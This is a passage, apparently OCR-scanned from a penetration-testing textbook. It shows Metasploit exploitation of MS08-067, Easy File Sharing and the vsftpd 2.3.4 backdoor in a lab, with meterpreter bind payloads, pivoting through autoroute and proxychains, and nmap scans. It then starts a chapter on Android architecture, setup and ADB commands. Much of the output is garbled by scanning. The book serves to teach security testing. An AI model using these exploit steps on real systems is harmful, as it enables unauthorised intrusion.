Compromise the victim using the MS08-067-Netapi exploit module and the Bind TCP payload, 
as shown in Figure 9.24: 


msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit (ms08_067_netapi) > show options 


Module options (exploit/windows/smb/ms08_067_netapi) : 


Name Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes The SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


Exploit target: 
Id Name 


ts] Automatic Targeting 


msf exploit (ms08_067_netapi) > set rhost 7.7.7.20 
rhost => 7.7.7.20 


msf exploit (ms08_067_netapi) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_ tcp 


Figure 9.24: MS08-067-Netapi exploit output_1 


Also, refer to Figure 9.25: 


msf exploit (ms08_067_netapi) > show options 


Module options (exploit/windows/smb/ms08_067_netapi) ; 


Name Current Setting Required Description 

RHOST Fa, 3520 yes The target address 

RPORT 445 yes The SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


Payload options (windows/meterpreter/bind_ tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, 
process, none) 

LPORT 4444 yes The listen port 

RHOST 7.7.7.20 no The target address 


Exploit target: 


Id Name 


0 Automatic Targeting 


Figure 9.25: MS08-067-Netapi exploit output_2 


Refer to Figure 9.26: 


msf exploit (ms08_067_netapi) run 


*] Started bind handler 
7.9.7 


. -20:445 - Automatically detecting the target... 

ed 7 445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown 

*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English 

*] 7.7.7.20:445 = Selected Target: Windows 2003 SP2 English (NX 

*) 7.7.7.20:445 - Attempting to trigger the vulnerability... 

*} Sending stage (957999 bytes) to 7.7.7.2 

") Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444 
meterpreter 


Figure 9.26: MS08-067-Netapi exploit output_3 


Easy file share BoF 


The easy file share application was also vulnerable. The following steps can be taken to set up 
the exploit module with the Bind TCP payload and compromise the target, as shown in Figure 


msf > use exploit/windows/http/easyfilesharing seh 
msf exploit (easyfilesharing seh) > show options 


Module options (exploit/windows/http/easyfilesharing_seh): 


RHOST yes The target address 
RPORT 60 yes The target port 


Exploit target: 


Id Name 


Easy File Sharing 7.2 HTTP 


msf exploit (easyfilesharing_seh) set rhost 7.7.7.20 

rhost => 7.7.7.20 

msf exploit (easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind tcp 


Figure 9.27: Easy File Share Exploit output_1 


Also, refer to Figure 9.28: 


exploit (easyfilesharing_seh run 


*) Started bind handler 

*) 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... 

+} 7.7.7.20:80 - Exploit Sent 

*} Sending stage (957999 bytes) to 7.7.7.20 

*} Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 <-> 7.7.7.20:4444) at 


2016-12-26 14:21:11 +0300 


meterpreter ipconfig 


Interface 1 
Name 

Hardware MAC : 
MTU 

IPpv4 Address : 127.0.0.1 


Name ae 
Hardware MAC 08: 00:27:29:cd:cb 
MTU 1500 

IPv4 Address : 
IPpv4 Netmask : 255.255.255.0 


Figure 9.28: Easy file share Exploit output_2 


Also, refer to Figure 9.29: 


Name (R) PRO/1000 MT Desktop Adapter # 
Hardware MAC : 27:€3:47:43 
MTU 


IPv4 Address : 2 
IPv4 Netmask 255.255.255.0 


Figure 9.29: Easy file share Exploit output_3 


In the last case, the point where the attacker comes is as shown in Figure 9.30: 


Windows Meterpreter 


172.16.0.11 
7.7.7.1 


172.16.0.20 172.16.0.15 172.16.0.16 7.7.7.20 7.7.7,.12 


Figure 9.30: Hidden network layout 


We have access to the 7.7.7.20 machine now. We will have to do some more data gathering. Like 


the RD machine, the JC-named machine has two NICs. We have 


network (8.8.8.0/24). Refer to Figure 9.31: 


Name Intel(R) PRO/1 MT Desktop Adapter 
Hardware MAC : 08:00:27:29:cd:cb 
MTU 


IPv4 Address 
Tpv4 Netmask 


el(R) PRO/ MT Desktop Adapter 
Hardware MAC 72€3°47:4 
MTU 
IPv4 Address To7ode2 
Ipv4 Netmask 255.255.2S5. 


Figure 9.31: Data Gathering using ipconfig 


discovered our second hidden 


Let us continue information gathering by performing ARP scanner on a second hidden network. 


Refer to Figure 9.32: 


meterpreter run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24 
*]} Running module against SRVO03 
*]) ARP Scanning $.8.8.0/24 
* 00 CADMUS COMPUTER SYSTEMS 
® UNKNOWN 
~ (CADMUS COMPUTER SYSTEMS 
. 00:27:13:a3:bl (CADMUS COMPUTER SYSTEMS 


Figure 9.32: arp_scanner module 


meterpreter run autoroute -s 8.8.8.0/24 

[*] Adding a rou 

+) Added rout 4:2 
*] Use the -p option to list all active 

msf route print 


Figure 9.33: Autoroute command 


ARP scan says four machines are found in this network. Refer to Figure 9.33: 


And we are adding the routing definition again. 


Double pivoting 


The 8.8.8.0/24 network was discovered during the information-gathering operation for the JC 
system. We already have a routing rule between the 172.16.0.0/24 and 7.7.7.0/24 networks, 
thanks to the first compromised system. 


Network packets sent from 172.16.0.20 to the JC device (second infected machine) are first sent 
to the RD device (first compromised machine), and then the RD transfers them to the JC 
machine. 


Attempts from the attacker computer (172.16.0.20) to contact the 8.8.8.9 location will go 
through two stages: 
e RD: We do not know how to access the 8.8.8.9 IP address. But we know the system, and 
who knows how to access it. We can direct you to it. 
e JC: We know how to forward packets from the 7.7.7.0/24 network to the 8.8.8.0/24 
network. 


Figure 9.34 is the final situation of the compromised and found systems: 


Windows Meterpreter 
owt 
yf S | 
172.16.0.20 172.16.0.15 172.16.0.16 7.7.7.20 7.7.7.42 8829 828.13 
8883 


ATTACKER 


Figure 9.34: Final state of the compromised system 


Holy ProxyChains 


The ProxyChains tool establishes and sends a link between proxy servers from start to finish. On 
the local 1081 port, a new socks4 proxy server for the newly discovered 8.8.8.0/24 network is 
started. Refer to Figure 9.35: 


Figure 9.35: Socks4a module 


The information for the new proxy server will be specified in the /etc/proxychains.conf 
configuration file. The Dynamic Chain functionality ensures that the defined proxy servers are 
switched in sequential order. Refer to Figure 9.36: 


Figure 9.36: proxychains.conf file 


The 8.8.8.9 target can be scanned using the ProxyChains tool via the second pivot system with 
the nmap utility. Refer to Figure 9.37: 


root@kali: 
ProxyChains-3.1 (http 


Starting Nmap 7.25BETA1 https 
Nmap wishes you a merry Christmas! Specify -sxX for Xmas Scan 


https 
NSE: Loaded 36 scripts for scanning. 
Init i 


ting Connect Scan 


1D-chain|!- 
Discovered o 
1D-chain|- 
Discovered 


1D-chain|- 20:1080 16.0.20:1081- -8.8.8.9:80- ~OK 


Discovered op 


Completed Con 1.37s elapsed (4 total ports 


Initiating Se 


Vi 


Scanning 4 servi 

|D-chain|-<>-172.16.0.2 

|D-chain|- 7 

|D-chain|-<>-172.16. 
5 


|1D-chain|-<>-172.16.0. 


Completed Service scan at 05:54 


Also, refer to Figure 9.38: 


NSE: Script scanning 8.8.8.3. 


NSE: Starting runlevel 1 (of 2) scan. 
Initiating NSE at 05:54 
[D-chain|-<>-172.16.0. 80- 72.16.0.20:1081- = “OK 
[D-chain!- 172.16.0. 80=- 72.16 2 ~<><>-8.8.8. 9:80- ~OK 
Completed NSE at 05:54, 1.7is elapsed 
NSE: Starting runlevel 2 (of 2) scan. 
Initiating NSE at 05:54 
Completed NSE at 05:54, 0.00s elapsed 
Nmap scan report for @.8.8.9 
Host is up, received user-set (0.4ls latency). 
TATE SERVICE REASON VERSION 
ftp syn-ack vsftpd 2.3.4 
ssh syn-ack OpenSSH 4.7pl1 Debian 8ubuntul (protocol 2. 
telnet syn-ack Linux telnetd 
http syn-ack Apache httpd 2.2.8 Ubuntu) DAV/2 
fo: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 
Read data files from: /usr/bin/../share/nmap 
Service detection performed. Please report any incorrect results at 
https 
Nmap done: i IP address (i host up) scanned in 14.59 seconds 
root@kali: 


Figure 9.38: Nmap output_2 


As you can see, the packages first transit through the first proxy server before proceeding to the 
second proxy server we set up. It arrives at its final destination. When the scan results are 
analyzed, it will be determined that the vsftpd service at 8.8.8.9 is vulnerable. 


The following methods are used to prepare the vsftpd exploit module in the Metasploit 
framework and compromise our final target. Refer to Figure 9.39: 


msf > 

msf > use exploit/unix/ftp/vsftpd_234_backdoor 

msf exploit (vsftpd_234_ backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor) : 
Name Current Setting Required Description 


RHOST yes The target address 
RPORT 21 yes The target port 


Exploit target: 


Id Name 


it] Automatic 


msf exploit (vsftpd_234 backdoor) > set rhost 8.8.8.9 
rhost => 8.8.8.9 


Figure 9.39: vsftpd exploit output_1 


Also, refer to Figure 9.40: 


msf exploit (vsftpd_234 backdoor) > run 


8.8.8.9:22 - Banner: 220 (vsFTPd 2.3.4) 
(*] 8.8.8.9:21 - USER: 331 Please specify the password. 
(+] 8.8.8.9:21 = Backdoor service has been spawned, handling... 
[+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root) 
{*] Found shell. 
(*] Command shell session 4 opened (Local Pipe -> Remote Pipe) 


Sy 


ped 

/ 

id 

uid=0(root) gid=#0 (root) 

ifconfig 

etho Link encap:Ethernet HWaddr 08:00:27:56:f1:7c 
inet addr:8.8.8.9 Beast:@.8.8.255 Mask:255.255.255.0 
inet6 addr: fe80::a00:27f£:fe56:£17c/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:10843 errors:0 dropped:0 overruns:0 frame:0 
TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:1081842 (1.0 MB) TX bytes:661455 (645.9 KB) 
Base address: 0xd010 Memory: £0000000-£0020000 

lo Link encap:Local Loopback 


inet addr:i27.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:18161 errors:0 dropped:0 overruns:0 frame:0 
TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0 


collisions:0 txqueuelen:0 
RX bytes:5307479 (5.0 MB) TX bytes:5307479 (5.0 MB) 


Figure 9.40: vsftpd exploit output_2 


Mitigations 


A few mitigations are as follows: 


e Multiple NIC systems that allow DMZ access should be eliminated from the current 
network topology. 


e Only DMZ structures should be used to access systems in the DMZ. 


Conclusion 


The attacker discovered two different secret networks by following the steps as follows: 


1. The attacker gained access to the RD machine on the same network as the attacker. 
2. Then he notices that the RD machine has two network interfaces. 

3. Using the autoroute post module, he created a routing rule. 
4 


. The attacker then ran an ARP and NMAP scan on the 7.7.7.0/24 network and discovered a 
machine named JC. 
JC had two different vulnerabilities. Easy File Share and MS08-067. 


6. After successfully exploiting MS08-067, the attacker gained access to the 7.7.7.20 
network. 


-_ 


7. Information gathering showed JC also have two network interfaces. 
8. Another routing rule is defined on 7.7.7.20. 
9. ARP and NMAP were used on 8.8.8.0/24. 

10. Vulnerable vsftpd was operating on the machine SK at 8.8.8.9. 


Refer to Figure 9.41: 


172.16,0.11 
77.741 


ATTACKER 


172.16.0.20 172.16.0.15 172.16.0.16 


vsftpd 2.3.4 


Figure 9.41: Final layout for hidden network 


While the attacker’s machine could only gain access to the first network he was connected to, 
and the attacks also gave him access to the two covert networks. 


uestions 


1. What is routing? 
2. What is pivoting? 
3. What is port forwarding? 


CHAPTER 10 
Android Penetration Testing 


Introduction 


Smartphones have grown ubiquitous, with over 1 billion users globally and 2.5 million apps (and 
counting) available on the Google and Apple digital marketplaces. Their impact on our lives is 
immediate and profound, affecting our daily lives in various ways, including how we connect, 
work, and socialize. The rise in consumer demand, as well as the processing power and 
capabilities of smartphones, such as storage, GPS, camera, screens, and other features, has 
shifted the paradigm of mobile application development. Online banking, trading, e-mails, 
airport check-ins, and much more are all available with a single tap. 


In this chapter, we will cover all the information we will need to begin hacking and penetration 
testing Android apps. The top 10 OWASP mobile application vulnerabilities will be discussed, 
as well as how to attack Android apps and their weaknesses, with examples. 


Structure 


The following topics will be covered in this chapter: 


e Android architecture 
e Android penetration testing environment setup 
e Android penetration testing tools 


e Secure android applications 


Objectives 


In this chapter, you will understand Android architecture in detail, learn how to set up an android 
penetration testing environment and know the popular android penetration testing tools. Finally, 
you will learn how to protect your Android applications. 


Android architecture 


Understanding the architecture of any platform is critical for any developer or security 
researcher. The hardware abstraction layer of Android is based on the Linux 2.x and 3.x kernels. 


It consists of the following: 
e Key application 
e Operation system 
e Middleware 


e Runtime environment 
e Different services 


e Native and custom libraries 
As indicated in Figure 10.1, it can be represented as five layers: 


APPLICATIONS 


ficatior 


Manager 
LIBRARIES ANDROID RUNTIME 


“red! Core Libraries 


LINUX KERNEL 


Flash Memory 


Figure 10.1: Android architecture 
All of the components have been fine-tuned and merged to give the best possible environment 
for developing and executing mobile applications. 


Let us take a bottom-up approach to learn about the various layers of the Android stack now. 


The Linux kernel 


The Linux kernel is at the core of the Android operating system. Linux was picked as the best 
contender to start with because of its flexible portability features, which allow for easy 
compilation of applications on a variety of hardware platforms. 


Process management/scheduling, memory management, and device management are all 
supported by the Linux kemel, which is located at the bottom of the software stack. It also serves 
as a key abstraction layer, allowing the app to communicate with physical devices by providing 
access to multiple device drivers. 


The automated tilt/rotation adjustment of the screen to match the orientation of the mobile device 
is a simple example of this. The following are some of the concerns: 

e How does this happen? 

e What triggers the device to perform this operation? 


e How does the OS come to know that the device orientation has changed? 


Let us take a closer look. 


The accelerometer and gyroscope are hardware sensors in the device that detect minute motions 
and changes in orientation and communicate this data to the kernel. This information is 
converted into software instructions by the device drivers, which are picked up by the apps; if the 
app is intended to respond to these instructions, it does so. The Linux kernel, as illustrated in the 
diagram as shown in Figure 10.2, contains all of the drivers needed for the hardware to function 
properly, as well as power management. 


In a nutshell, the Linux kernel is in charge of memory, resources, power, and driver 
management. 


LINUX KERNEL 
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Figure 10.2: Linux kernel 


Confusion between Linux and the Linux kernel 


The name Linux is commonly used to refer to the complete operating system, whereas kermel 
refers to the operating system’s core. The fact that Android is based on the Linux kernel does not 
imply that it is another Linux distribution; it just means that Linux is the fundamental operating 
system, and not all Linux programs may be loaded on Android. 


Android runtime 


Although Android is written in Java, the Dalvik Virtual Machine (DVM), core Java libraries, 
and a new virtual machine dubbed Android Runtime (ART) make up the runtime layer of the 
Android architecture. 


Figure 10.3 is from Android 4.4 KitKat, which allows developers to create ART applications: 
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Figure 10.3: Android runtime (ART) option 


Apps written in Java are executed on the DVM. Due to licensing issues, the DVM does not claim 
to be a Java virtual machine (JVM), although it serves the same purpose. The reason for this is 
that Dalvik is designed to run on low-power and low-memory devices. The DVM is only 
initiated once for performance reasons. A system service called Zyeole clones each new instance 
of it. The structure of the Android runtime is shown in 


ANDROID RUNTIME 


L/aIVIK V 


Machine 


Figure 10.4: Android runtime core libraries 


When we build a Java application, we get bytecode. This bytecode can be executed by the JVM, 
which is a virtual machine (a virtual machine is a program that acts as an operating system). 
depicts the compilation of a Java program: 


JAVA JAVA 
SOURCE BYTE 


JAVA 
CODE [> Compiler > CODE 


(.java) (.class) 


Figure 10.5: Java program compilation process 


The Dalvik virtual machine 


In Android, the bytecode created by the JVM is sent into the DVM, which generates a 
lightweight format known as .dex. 


Why is it necessary to convert Java bytecode to .dex format? 


The answer is that we do not have the same amount of power, memory, and RAM on mobile 
devices as we do on PCs. This explains why we require increasingly lightweight applications. On 
PCs, Java bytecode is appropriate for heavyweight applications. The DVM uses compression 
techniques to eliminate superfluous information in the classes before generating the .dex file. 
For example, if your Java source code has 1,000 classes, all these 1,000 classes will be available 
as a Single file in the Dalvik executable format (.dex). 


The conversion of Java source code (.java) to Dalvik byte code (.dex) is depicted in the 
flowchart as shown in Figure 10.6: 


JAVA DALVIK 


BYTE BYTE tp 
JAVA b> DEX > 
Compiler CODE > Compiler CODE 


(.class) (.dex) 


Figure 10.6: Conversion of .java to .dex 


Zygote 
The zygote is one of the first programs that start when an Android device boots up, and it is 
responsible for the following: 

e Starting up a virtual machine 

e Preloading the core libraries 


e Initializing various shared structures 


Core Java libraries 
These are distinct from the core Java libraries’ Java SE and Java ME libraries. Dalvik libraries 
are a common name for them. These are some of them: 
e DVM-specific libraries: These libraries are designed to communicate with a DVM 
instance directly. They are unlikely to be used by the development community. 
e Java interoperability libraries: These are just a collection of classes found in the core 


Java runtime libraries; often, the libraries assist with file operations, string manipulation, 
and other networking tasks. 


ART 


The DVM was totally replaced by ART when Android Lollipop was released by Google. ART 
has several advantages over the DVM, which include the following: 


e Ahead-of-time (AOT) versus old Just-in-time (JIT) Compilation 
e Improved garbage collection 
e Better application performance 


The process of compiling ART code is depicted in Figure 10.7: 


Dalvik | ART | 


= 


Figure 10.7: Comparison between Dalvik and ART compilation 


Native libraries 


Some low-level components cannot be interacted with when developing in Java. If you need to 
display graphics on the device screen, for example, you will not be able to write code directly in 
Java; instead, you will need to write a function or method that calls other native programs that 
are not Java programs. 


The native libraries in Android are non-Java programs. The libraries are written in various 
languages, including C, C++, and others. The Android Native Development Kit (NDK), which 
contains a wide range of libraries and headers that allow developers to create and build various 
activities, is used to install this native code. 


Figure 10.8 depicts the many native libraries that are currently available on the Android 


platform: 
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Figure 10.8: Native libraries 


It can be customized by any Original Equipment Manufacturer (OEM). The libraries module 
usually contains the following items: 


The media framework: This framework is built on PacketVideo OpenCore platforms 
and supports common audio, video, and still-frame formats as well as codec plugins. The 
StageFright flaw was discovered by exploiting a media framework (libStageFright) flaw 
that gave attackers full remote access via a feature that automatically played video files 
received via MMS or other means on an Android device. 


The surface manager: The display subsystem is supported, and many applications’ 2D 
and 3D graphics layers are rendered. 


Freetype: This is used to render bitmap and text. 


OpenGL ES: OpenGL is a cross-platform graphics API that defines a software interface 
for 3D graphics processors. 


Secure Socket Layer (SSL): This is based on OpenSSL (www.openssl.org). 


SQLite: The application framework API makes this lightweight relational database 
engine available to any application. 


WebKit: This is a browser engine based on the WebKit browser (www.webkit.org), 
which supports page rendering, full CSS, JavaScript, DOM, and AJAX, as well as single- 
column and adaptive view rendering. 


SGL (short for Scalable Graphics Library): This is used for 2D graphics libraries. 
libc: Standard C system libraries derived from BSD for embedded Linux-based devices. 


The application framework 


The application framework gives developers the tools they need to create far more complicated 
apps or tools. This framework is used to manage the application’s full development lifecycle. 


A developer who is developing an app that requires the notification feature, for example, does 
not need to write a single line of code; instead, he or she may just call the Notification Manager 
API. Most of the APIs required to operate an Android smartphone are provided by this 
framework. 


A list of the frameworks that are now available for the Android platform is shown in Figure 
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Figure 10.9: Application framework 


The key services in this framework are as follows: 


Activity manager: The Activity Manager manages an app’s full lifetime and is also 
responsible for handling the many states of activity to ensure that apps using different 
processes operate smoothly, which we will go over in depth in the next section. 


Content providers: This component enables applications to share and publish data with 
other apps. The content provider oversees encapsulating data, defining data security, and 
controlling data structure. When all of a user’s input to an app is structured and kept in an 
SQLite database, this is an example. 


Resource manager: The Resource Manager manages access to all embedded resources 
that are not coded in the app, such as graphics, localized strings, and other layout files. 


Notifications manager: This provides mobile user notifications and displays alerts. 


View system: The View System oversees many views, event dispatching, and other 
important buttons and lists. 


Package manager: This controls all the application packages that are installed on the 
device. 


Telephony manager: This provides telephone services, such as status and subscriber 
information, to the device. 


Location manager: This gives location services about changes in location, allowing an 
app to receive updates. 


Window manager: It oversees organizing the screen that is shown to the user and 
providing the surface with decision-making capabilities when the application is to be 
generated and layered appropriately on the display window. 


The applications layer 


This is the first layer of the Android stack, and it is through applications that the bulk of 
consumers interact with their phones. As shown in Figure 10.10, there are two types of 
applications that are generally available on the device: 


Applications 
Native android apps Third party apps 


Figure 10.10: Applications layer 


Now, let us explore the differences. 


Native Android or system apps 


System apps are applications that are placed on the phone by the manufacturer and provided with 
it. The e-mail client, SMS program, phone, calendar, maps, phone dialer, browser, contacts, and 
other applications are all loaded by default. These apps are usually not able to be removed from 
the device and reside in the /system folder. 


User-installed or custom apps 


The user can download and install these applications through a variety of distribution networks, 
including Google Play and Amazon Store. These apps are in the Android filesystem’s 
/data/data/ subdirectory. In the next sections, we will go over the specifics of the security 
features. 


Android penetration testing environment setup 


For any form of a security evaluation, establishing a well-structured test environment is critical. 
It is recommended that you start with a zero environment, presuming that nothing is installed on 
your PC. The hardware and software requirements for establishing a basic infrastructure for 
Android Application Penetration Testing are listed as follows. 


This book concentrates on setting up the environment on Windows, but you are free to 
experiment with Linux and other operating systems as well. 


e Hardware and OS requirements: 

°© A workstation/laptop running Windows 7 (64-bit) 
e Mobile Devices and OS requirements: 

© Google Nexus 5 or any other device running Android 5.0 or higher (rooted) 
e Software requirements: 


o Python 
o Java Development Kit (1.8) 


e Other requirements: 


© Compatible USB cables for mobile devices 
o Network Wi-Fi devices (one can use any smartphone with a tethering facility to act 
like a Wi-Fi router) 
Why do you need a rooted phone for your test environment? 


It is as basic as being able to edit and install any tools on the device and run unsigned software 
from atypical app shops. Rooted phones will have complete filesystem access. The scope of this 


book does not include rooting a mobile device. 


Android Studio and SDK 


The official Integrated Development Environment (IDE) for developing Android Apps is 
Android Studio, which Google supports. Java was replaced by Kotlin on May 7, 2019, as a 
preferred language for developing Android Apps. But still, Java is being used for developing 
Android Apps. Android Studio Dolphin|2021.3.1 has the following features. 


Gradle-based build support. 
UI components can be created by drag and drop features in the layout editor. 
Common Android designs and components can be created by template-based wizards. 


Built-in support for Google Cloud Platform, enabling integration with Firebase Cloud 
Messaging (Earlier Google Cloud Messaging) and Google App Engine. 


Lint tools to catch performance, usefulness, version compatibility, and other problems. 
Multi-preview API. 
Wear OS pairing Assistant. 


The following prerequisites must be met before downloading and installing Android Studio. 


Operating System Version—Microsoft Windows 8/10 (64-bit). 


x86_64 CPU Architecture 2"¢ generation Intel Core or later or AMD CPU with support a 
Windows. 


Random Access Memory (RAM)—Minimum 8 GB RAM or more. 
Free Disk Space—Minimum 8 GB for IDE + Android SDK + Android Emulator. 
Minimum Required JDK Version—Java Development Kit (JDK) 8. 


Minimum Screen Resolution—1280 * 800 resolution. 


Downloading and installation of Android Studio 


To download and install Android Studio, follow the given steps: 


1. 


2: 


To download the Android Studio, visit the official Android Studio website 
(https://developer.android.com/studio/) in your Web browser. 


Click on the Download Android Studio option, as shown in Figure 10.11: 
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Figure 10.11: Download Android Studio from website 


3. After downloading, double-click on the Android Studio-ide.exe file. 


4. Android Studio Setup will appear on the screen, and click Next to proceed, as shown in 
Figure 10.12: 


@® Android Studio Setup 


Welcome to Android Studio Setup 


Setup will guide you through the installation of Android 
Studio. 


It is recommended that you close all other applications 
before starting Setup. This will make it possible to update 
relevant system files without having to reboot your 
computer. 


Click Next to continue. 


Android 
studio 


Figure 10.12: Android Studio Setup_1 


5. Select the components that you want to install and click on the Next button, as shown in 
Figure 10.13: 


am Android Studio Setup 


Choose Components 
Choose which features of Android Studio you want to install. 


Check the components you want to install and uncheck the components you don't want to 
install, Click Next to continue. 


Select components to install: Android Studio 
Android Virtual Device 


Space required: 2.3GB 


Figure 10.13: Android Studio Setup_2 


6. Now, browse the location where you want to install the Android Studio and click Next to 
proceed, as shown in Figure 10.14: 


am Android Studio Setup 


Configuration Settings 
Install Locations 


Android Studio Installation Location 


The location specified must have at least 500MB of free space. 
Click Browse to customize: 


F:\Android Studio | (Browse. J 


Figure 10.14: Android Studio Setup_3 


7. Choose a start menu folder for the Android Studio shortcut and click the Install button 
to proceed, as shown in Figure 10.15: 


am Android Studio Setup 


Choose Start Menu Folder 
Choose a Start Menu folder for the Android Studio shortcuts. 


Select the Start Menu folder in which you would like to create the program's shortcuts. You 
can also enter a name to create a new folder. 


Accessories 
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Free FLV Player 

IIs 

Java 


[_]Do not create shortcuts 


Figure 10.15: Android Studio Setup_4 


8. After the successful completion of the installation, click on the Next button, as shown in 
Figure 10.16: 


Installation Complete 
Setup was completed successfully. 


Completed 


Extract: resources_en.jar... 100% al 
Extract: yaml.jar... 100% 
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Figure 10.16: Android Studio Setup_5 


9. Click on the Finish button to proceed, as shown in Figure 10.17: 


am Android Studio Setup 


Completing Android Studio Setup 


Android Studio has been installed on your computer. 


Click Finish to dose Setup. 


Start Android Studio 
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Figure 10.17: Android Studio Setup_6 


10. Now, your Android studio welcome screen will appear on the screen, as shown in Figure 
10.18: 


android studio 


Figure 10.18: Android Studio Setup_7 


The Android SDK 


The Android SDK allows developers to create, test, and debug apps for the Android platform. It 
includes all the necessary software libraries, APIs, emulator system images, documentation, and 
other resources for developing Android apps. We have installed Android Studio along with the 


Android SDK, and it is critical to grasp how to make the most of the SDK’s built-in features. 
This section gives an overview of some of the key tools we will use to attack an Android app as 
part of the penetration testing exercise. 


The Android Debug Bridge 


This is what we talked about in this chapter’s Android Architecture section. It is a 
straightforward and powerful command-line tool that will be used to interface with and operate 
Android devices. It is necessary to activate USB-Debugging to connect with ADB on a physical 
device. You can access this on the Galaxy Note 10 with Android v9 by going to Settings | 
Developer settings, as demonstrated in Figure 10.19. 


If the Developer options are not visible, it is because they are disabled; you may enable them by 
touching the Build number field, which can be discovered by going to Settings | About Phone | 
Software information |Build number. You should tap seven times in total. 


Refer to Figure 10.19: 
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Figure 10.19: Android debug bridge 


The following is a collection of ADB commands that will be used during the testing process. 


Connecting to the device 


Once the device is connected to the workstation, use the ADB devices command to see if the 
device is correctly set up with the correct device drivers. This command displays a list of all 
connected devices to your workstation. Refer to Figure 10.20: 


Gi >adb devices 
List of devices attached 


0072c52ca20e47cf£ device 


Figure 10.20: ADB devices command_1 


When you run this command without the device drivers for the mobile device loaded, you will 
get a blank list, as shown in Figure 10.21: 


c:\ >adb devices 


List of devices attached 


Figure 10.21: ADB devices command_2 


In this instance, you may need to download and install device drivers from the device 
manufacturers’ websites. 


Getting access to the device 


Android is based on the Linux kernel, as detailed in this chapter’s Android Architecture section. 
You may use ADB to connect to a shell and perform commands on your mobile device. If the 
Allow USB Debugging option is enabled once entered, the ADB shell command can be used on a 
rooted or unrooted device, as demonstrated in the command-line output as follows. You will 
have access to a standard shell with some limitations. You may need to enter root mode by 
typing su, which allows you to run most Linux commands. Refer to Figure 10.22: 


e-\ >adb shell 
shell@mako:/ §$ ls 
acct 

cache 

charger 

config 
shell@mako:/ $ su 
root@mako:/ # ls 
acct 

cache 

charger 


Figure 10.22: ADB shell command 


If the workstation is connected to more than one device, you may need to use different 
parameters. Refer to Figure 10.23: 


c:\ >adb devices 


List of devices attached 


192.168.56.101:5555 device 
0072c52ca20e47cf£ device 
c:\ >adb -s 0072c52ca20e47c£ shell 


shell@mako:/ $ su 


Figure 10.23: ADB devices and shell commands 


e -s to connect to the device 
e -d to connect only to the USB device 


e -e to connect only to an emulator 


Installing an application to the device 


Installing an Android app on a hardware device or an emulator would be a basic prerequisite 
during the evaluation process. You can use the ADB install command; this will require the APK 
file to be installed, as shown in Figure 10.24: 


adb install <nameoftheapp.apk> 


GE Administrator: C:\windows\system32\cmd.exe 


>:NEBEEEEEDadb install nanmeof theapp.apk 
2847 KB/s (1573498 bytes in 8.539s> 

pkg: /data/local/tnap/nancof theapp.apk 
Success 


Figure 10.24: ADB install command 


Extracting files from the device 


To examine what data is stored during installation and uninstallation, we must ensure that no 
sensitive information is left behind that could be exploited by rogue applications or users. As a 
result, we extract the files for offline examination to access any sensitive data. This can be done 
by using the ADB pull command and specifying the file location on the device. We are grabbing 
all the apps that are installed on the rooted device in Figure 10.25: 


rc 


GE C:\windows\system32\cmd.exe = ‘(e] 


\workingfolder>adb pull /data/data/com.android.enail 
= building file list... 
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i .db-journal 
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-email/databases/EmailProviderBody.db-journal > .#d 


a/con.android.email/databases/EmailProviderBody.db -> ./databases 
iy.db 
/con.android.email/databases/EmailProvider.db-—journal 
ex .db-journal 
/data/data/con.android.email/databases/EmailProvider.db -—> ./databases/ 


/shared_prefs/fndro idMail.Main.xml 


‘shared * ‘MailfippProvider.xml -> ./shared 
lAppProvider.xnml 
lata/data/con.android.email/shared_prefs/Unif iedEmail.xml -> ./shared_pre 
s/Unif iedEmail.xml 
16 files pulled. 6 files skipped. 
1991 KB/s (207059 bytes in @.1@1is> 


Figure 10.25: ADB pull command 


Storing files to the device 


We may want to copy local files from the desktop to the Android device most of the time. The 
syntax is ADB push local file remote location, where remote location is the location where the 
file should be stored. For example, the following command line output shows a pushme. JPG file 
being moved from a local workstation to the device’s /sdcard/ folder, as shown in Figure 
10.26: 


C:\ \sdk\platform-tools>adb pushme.JPG /sdcard/ 
6786 KB/s (840927 bytes in 0.121s) 


Figure 10.26: ADB command 


Stopping the service 


In other circumstances, we may want to disconnect the devices, in which case the ADB server 
must be restarted. This can be accomplished with the ADB kill-server command, which will 
kill the ADB connection and restart it when you provide a new ADB command. 


Viewing the log information 


Through logcat, Android provides a good view of system debugging messages; use the ADB 
logcat command, as seen in Figure 10.27. Examine the many types of logs that programs and 
systems collect in various buffers. This feature has the potential to be a source of data leakage 
during the assessment: 


| Administrator: C\windows\systemaa 


>: i >.ap logcat 
beginning of system 
/local_ opengl¢ @>: Starting local_opengl 
- ~~ beginning of main 
E/v input-seanless< found seamless mouse device 


I/SurfaceFlinger¢ 2 : "SurfaceFlinger is starting 
Le erecce™ 2inger< : SurfacePlinger’s main thread ready to run. Initializing 
: loaded ten/lib/egl/1LibEGL_emulation.so 
> loaded en/lib/egl/1ibGLESvi_CM_emulation.so 
< : loaded /systen/lib/egl/1libGLESv2_enulation.so 
2 : Failed to connect to host (UnixStream>?tt?t 
E-EGL emulation¢ 268>: Failed to establish connection with the host 
//1ibEGL ¢ 208): eglInitialize<@xb?2a684@> failed <EGL_SUCCESS)> 
I /mediaserver¢ 71>: ServiceManager: 6xb6216d48 
I/AudioF linger<¢ 71>: Using default 3668 mSec as standby time. 
71>: Waiting for service batterystats... 
